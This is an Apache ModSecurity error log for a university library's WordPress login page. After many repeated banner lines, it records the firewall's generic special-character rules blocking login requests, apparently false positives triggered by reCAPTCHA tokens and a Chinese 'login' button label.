Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
Producer: ModSecurity for Apache/2.7.7 (http://www.modsecurity.org/); OWASP_CRS/2.2.8.
[Mon Aug 28 16:15:36.937085 2023] [:error] [pid 47131] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:g-recaptcha-response. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within ARGS:g-recaptcha-response: 03ADUVZwCkf_aAeLfxw9-yWwmDe9FSuFV3tnGlev9jWryYmofxFyjRas0EPn-znp86gSG65R4YvBJrS83SORwHLEDB_XzIfB9KjxYxrWR_wcalQ32e_Wvl6e2t0O9MaDRan1hRB3ChFPL2ocfs9XC_smcQYxDswoc70oRxrZUJe-LMKzZ95ubaMMUnqq_MxPBU2Wbzya3Mn8bMGVc3LgMAlwFBtp0wCluEIjVyt-60F8ohhwIesKpL0HU5AdZrRT79I_Oyv9XaHFjuNC_8qLwWF44_mUoWXaohu6GfT5e9iaFg-aLSz9ZkuF5gtjnKt_AqNZ14o7r24gPgj8guQf3bX4UnNwKA1m-mf1QL5FKZ57yZIqS6MQ2FxIQhfovjwQoSzD0QMRKZcgwp8kfZmSzZSh15xE_dDSL8wcC_Ydo4zVcHCGhVWhGiGLiWTM9GLxAE_0T..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [t [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOxluMCo-f0AALgbrbMAAAAZ"]
[Mon Aug 28 16:30:00.400358 2023] [:error] [pid 47201] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:g-recaptcha-response. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within ARGS:g-recaptcha-response: 03ADUVZwCxlmKYn3da6wbpQbeuan9yfPe8eggLWstzpfCeReLYiir-QzldZJUtFmkpJu0dtZoTmt537QXPERba2hxhkbnyB8EEvyBa40qYbKGJV8Cvw-pzZ8zclev69zt5_rhcUVL6VvK8eQWcjBhCNlAjdakLGmbVcqyU9up3Svd7qg1YIuMg4p2nMPxliC1lMQ0iRvuHUgiHzWiO52gQlIx4l164ft7GW6utX05FFj0TcoTi_-pOoaTbOfmvLgc4sZavu9SZSrgv193cEouiAldTMy8e3HVPKJKcfCehGpfMEEuZ5_w9Y7zh89v98CFg9P6uFimkE0ze9mRZTyXBRmA8KoHI1JxeAWJNZ43bwu_A-RndcuFBuSj3GLVqiih-2h8ODxvfxjvrB5S78ggw4s0hF8GBPjFC_VpVUsu3iFo-VRjUi_mQCTUr1SH4JQvXcgw..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [t [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOxpGMCo-f0AALhhCBYAAAAK"]
[Mon Aug 28 17:34:06.938266 2023] [:error] [pid 48825] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:g-recaptcha-response. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within ARGS:g-recaptcha-response: 03ADUVZwCHyaDd_a9e1kH3FFvgtn8YNsvwKyz8NM6l8lzmM7yhEZgZPJFCSxwmMhSbqPYUf4FI-biN1tNterb-ysBK9PC08AkgdGm_3Or4KxW5j1xaJ53vGz5fSZd7Fqj5DI0KpfjR6syPBXp7h7vMir0ElsnulgzLSS_RlLvx40AdCCFMp5g9SgXDRng4WtEbSfYqIcKnhkzXkzg9BoVG62r2qo7T6SlccQDNKylUvQ8NS2AXKhFED7NRd5oZ4HJzD4tZsOYT0tOlFy8zMOv99sbHImNpzUKXIp6Sct1oIpoS6Q_0bOO2_slS7OrS4DTzeJwv7StkgI_y5zQXdSpdBM84G6oay2JZopHmEzU_EHvhOy1-J-59IN_ofcusoZ3qDp6PvIpjEQq37XXhsZzzYa6LRLhdAWgW0Jq9-bzeIijHHukRjojs3Q0Hw2rJPzd7wgG..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [t [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOx4HsCo-f0AAL659ZcAAAAU"]
[Mon Aug 28 19:19:51.600154 2023] [:error] [pid 50555] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyQ58Co-f0AAMV74TYAAAAJ"]
[Mon Aug 28 19:19:52.644539 2023] [:error] [pid 50555] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyQ6MCo-f0AAMV74TcAAAAJ"]
[Mon Aug 28 19:19:56.486412 2023] [:error] [pid 50555] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyQ7MCo-f0AAMV74TgAAAAJ"]
[Mon Aug 28 19:20:02.644260 2023] [:error] [pid 50559] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyQ8sCo-f0AAMV-dh0AAAAM"]
[Mon Aug 28 19:20:13.809163 2023] [:error] [pid 50554] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyQ-cCo-f0AAMV6u9UAAAAI"]
[Mon Aug 28 19:20:18.525896 2023] [:error] [pid 50554] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyRAsCo-f0AAMV6u9YAAAAI"]
[Mon Aug 28 19:20:27.196107 2023] [:error] [pid 50563] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyRC8Co-f0AAMWDSVEAAAAC"]
[Mon Aug 28 19:20:35.427135 2023] [:error] [pid 50504] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyRE8Co-f0AAMVIj44AAAAD"]
[Mon Aug 28 19:20:40.796686 2023] [:error] [pid 50556] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyRGMCo-f0AAMV8N@8AAAAA"]
[Mon Aug 28 19:20:49.343284 2023] [:error] [pid 50567] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyRIcCo-f0AAMWH4-wAAAAP"]
[Mon Aug 28 19:20:57.058735 2023] [:error] [pid 50566] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyRKcCo-f0AAMWGazEAAAAL"]
[Mon Aug 28 19:21:01.719265 2023] [:error] [pid 50566] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyRLcCo-f0AAMWGazIAAAAL"]
[Mon Aug 28 19:21:09.621492 2023] [:error] [pid 50568] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyRNcCo-f0AAMWIprIAAAAR"]
[Mon Aug 28 19:21:18.147400 2023] [:error] [pid 50570] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyRPsCo-f0AAMWKqI0AAAAI"]
[Mon Aug 28 19:21:22.485931 2023] [:error] [pid 50570] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyRQsCo-f0AAMWKqI4AAAAI"]
[Mon Aug 28 19:21:29.640417 2023] [:error] [pid 50570] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyRScCo-f0AAMWKqI8AAAAI"]
[Mon Aug 28 19:21:38.319748 2023] [:error] [pid 50576] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyRUsCo-f0AAMWQbHsAAAAV"]
